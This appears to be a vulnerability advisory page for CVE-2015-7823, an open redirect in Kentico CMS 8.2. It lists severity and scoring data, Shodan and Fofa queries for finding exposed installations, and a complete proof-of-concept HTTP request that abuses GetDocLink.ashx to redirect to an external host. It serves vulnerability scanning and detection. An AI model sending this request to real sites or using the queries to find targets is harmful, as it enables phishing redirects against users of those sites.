| Title | Kentico CMS 8.2 - Open Redirect |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. |
| Remediation | Apply the latest security patches or upgrade to a newer version of Kentico CMS. |
| CVSS Score | 5.8 |
| EPSS Score | 0.1267 |
| CVE ID | CVE-2015-7823 |
| CWE ID | NVD-CWE-Other |
| Shodan Query | cpe:"cpe:2.3:a:kentico:kentico_cms"http.title:"kentico database setup" |
| Fofa Query | title="kentico database setup" |
| Tags | cve2015 cve kentico redirect packetstorm vuln |
Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.
GET /CMSPages/GetDocLink.ashx?link=https://interact.sh/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-7823.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-7823.pcap
N/AN/A